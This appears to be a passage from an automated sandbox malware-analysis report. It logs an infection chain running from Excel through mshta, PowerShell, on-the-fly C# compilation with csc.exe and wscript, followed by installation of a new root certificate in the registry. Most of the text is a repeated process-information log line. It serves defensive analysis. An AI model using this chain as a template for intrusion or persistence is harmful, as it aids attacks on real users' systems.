Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_000007FE899B022D push eax; iretd	6_2_000007FE899B0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_000007FE899B00BD pushad ; iretd	6_2_000007FE899B00C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 16_2_00402AC0 push eax; ret	16_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 16_2_00402AC0 push eax; ret	16_2_00402AFC

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
